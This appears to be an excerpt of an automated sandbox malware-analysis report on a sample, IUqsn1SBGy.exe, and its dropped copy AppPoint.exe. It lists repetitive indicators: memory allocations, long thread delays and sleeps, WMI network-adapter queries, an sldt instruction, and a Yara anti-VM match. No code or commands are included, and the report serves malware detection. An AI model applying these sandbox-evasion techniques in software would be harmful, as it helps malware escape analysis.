Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: IUqsn1SBGy.exe PID: 4688, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AppPoint.exe PID: 7392, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AppPoint.exe PID: 7668, type: MEMORYSTR

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Memory allocated: 1770000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Memory allocated: 3340000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Memory allocated: 5340000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Memory allocated: 59F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Memory allocated: 69F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Memory allocated: 6B20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Memory allocated: 7B20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Memory allocated: BCD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Memory allocated: A570000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Memory allocated: CCD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Memory allocated: DCD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Memory allocated: F210000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Memory allocated: 10210000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Memory allocated: 11210000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Memory allocated: 11B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Memory allocated: 2B80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Memory allocated: 29B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Memory allocated: C60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Memory allocated: 27F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Memory allocated: 2710000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Memory allocated: 4DE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Memory allocated: 5DE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Memory allocated: 5F10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Memory allocated: 6F10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Memory allocated: A970000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Memory allocated: 9170000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Memory allocated: B970000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Memory allocated: 5F10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Memory allocated: A970000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Memory allocated: B970000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Memory allocated: E90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Memory allocated: 2970000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Memory allocated: 4970000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Memory allocated: 1510000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Memory allocated: 2FB0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Memory allocated: 4FB0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Memory allocated: 5620000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Memory allocated: 6620000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Memory allocated: 6750000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Memory allocated: 7750000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Memory allocated: B220000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Memory allocated: C220000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Memory allocated: C6B0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Memory allocated: 6750000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Memory allocated: B220000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Memory allocated: C6B0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Memory allocated: F80000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Memory allocated: 2A40000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Memory allocated: 27B0000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\IUqsn1SBGy.exe

Code function: 5_2_06FC4A5A sldt word ptr [eax]

5_2_06FC4A5A

Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 599344	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 599226	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 599124	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 599016	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 598906	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 598797	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 598687	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 598578	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 598469	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 598359	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 598247	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 598141	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 598031	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 597922	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 597812	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 597703	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 597592	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 597484	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 597375	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 597263	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 597153	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 597038	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 596936	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 596818	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 596668	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 596552	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 596437	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 596328	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 596217	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 596109	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 596000	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 595890	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 595781	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 595672	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 595562	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 595453	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 595342	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 595234	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 595125	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 595016	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 594891	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 594781	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 594672	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 594562	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 599888	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 599643	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 599527	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 599144	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 599016	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 598891	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 598672	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 598344	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 598225	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 598109	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 598000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 597890	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 597781	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 597672	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 597562	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 597453	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 597344	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 597234	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 597125	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 597016	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 596905	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 596781	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 596669	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 596561	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 596426	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 596297	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 596187	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 596078	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 595969	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 595859	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 595750	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 595641	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 595516	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 595391	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 595281	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 595172	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 595063	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 594938	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 594826	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 594708	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 594593	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 594480	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 594371	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 594235	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 594124	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 594000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 599890
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 599781
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 599671
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 599562
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 599453
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 599343
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 599234
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 599122
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 599015
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 598905
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 598796
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 598687
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 598578
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 598468
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 598359
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 598250
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 598140
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 598030
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 597921
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 597812
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 597703
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 597593
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 597484
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 597374
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 597265
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 597156
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 597046
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 596937
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 596828
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 596718
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 596609
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 596500
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 596390
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 596281
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 596171
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 596062
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 595952
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 595843
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 595734
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 595624
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 595515
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 595406
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 595296
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 595186
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 595078
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 594968
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 594859
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 594749
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 594640

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6382	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3338	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Window / User API: threadDelayed 3520	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Window / User API: threadDelayed 6338	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Window / User API: threadDelayed 3686	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Window / User API: threadDelayed 6154	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Window / User API: threadDelayed 7420
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Window / User API: threadDelayed 2442

Source: C:\Users\user\Desktop\IUqsn1SBGy.exe TID: 6508	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3620	Thread sleep time: -9223372036854770s >= -30000s	Jump to behavior
